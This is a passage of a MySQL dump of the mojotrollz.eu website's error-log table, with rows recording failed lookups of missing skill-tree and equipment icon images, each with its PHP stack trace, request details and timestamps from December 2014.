call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:46', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_stormreach.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 107, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (612, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_volcano.png\' found.', 'efb9ac53b068c43c21836fa00297e90c36fd40da', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_volc...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_volc...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:40:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_volcano.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 116, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (613, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_lightning_lightningbolt.png\' found.', 'edc3358bfa398bbc725d1bf5243c1df2f5e0625a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_lightning...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_lightning...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 00:54:34', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_lightning_lightningbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (614, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_wispheal.png\' found.', 'a97f72ebdd900c2f1f145adce78841fa00b54301', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_wi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_wi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_wispheal.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 150, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (615, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_lightning_lightningbolt01.png\' found.', '896c3a8822319fccad08127254d8b17858bf2462', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_lightning...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_lightning...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:40:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_lightning_lightningbolt01.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 99, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (616, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_grimward.png\' found.', '694edc8ede9e5b8c40c6d58cd035982b37597749', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_gr...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_gr...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:40:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_grimward.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 221, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (617, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_stoneskintotem.png\' found.', '36d54c9fd1cf713c78ecdf498d426cc3a9c15584', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_st...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_st...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:49:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_stoneskintotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 99, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (618, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nature_earthbindtotem.png\' found.', 'd0bfd2423901be9bf83a985b9df1781f6ba80568', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'nature_earthbin...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'nature_earthbin...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.044, '2014-12-14 00:59:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=nature_earthbindtotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (619, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_axe_10.png\' found.', 'aa90c3deeee02d2ace59e929febc61f6e87086b5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_axe_10.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_axe_10.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.036, '2014-12-14 03:49:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_axe_10.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 81, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (620, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_enchantment.png\' found.', '3efa77e76565d6eb55c23a70787b928838f8024d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_ench...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_ench...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 01:06:58', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_enchantment.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (621, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_enchantweapon.png\' found.', '6586dd7a2a7d4c4b8a315476e9253f0df1c0c1d6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_ench...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_ench...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:49:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_enchantweapon.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 71, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (622, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_flametounge.png\' found.', '737795f8d200b69c80960bf5aa765e024aa9c057', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_flam...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_flam...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:49:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_flametounge.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 69, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (623, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_swiftstrike.png\' found.', 'c0198105cb3854b872b77566392f6304c5ada921', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:49:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hunter_swiftstrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 65, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (624, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'equipment_bg.png\' found.', '3ead820efaa1b0b1f6a7d8f775bba4bde972710c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'equipment\', \'equipment_bg.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'equipment\', \'equipment_bg.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 01:36:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=equipment&id=equipment_bg.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (625, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_magicimmunity.png\' found.', '69d155b48042b54c4ffcb82ea4601377729bb831', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_magicimmunity.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 49, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (626, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_manarecharge.png\' found.', '566525c427f4add8c3778c6058a6824b8dbc07d6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_man...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_man...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_manarecharge.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 47, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (627, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_undyingstrength.png\' found.', 'b8c47a28773229d30df6584685a43ef42dfde303', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_un...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_un...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_undyingstrength.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 43, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (628, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_healingwavelesser.png\' found.', '2c6b338263beb120b742066cc2a4fe86f768f633', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_he...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_he...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_healingwavelesser.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 35, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (629, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_nullward.png\' found.', 'c8127de954dbfaceaac331bb56b5aa18c247c351', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_nu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_nu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_nullward.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 29, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (630, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nautre_manaregentotem.png\' found.', '09bc1fb3217b60dcd2faef0de04d70d8ce8d7974', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nautre_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nautre_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 02:23:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nautre_manaregentotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (631, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_healingway.png\' found.', '082f4be2c50a59295a39da96689cc958fdd8b603', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_he...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_he...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, 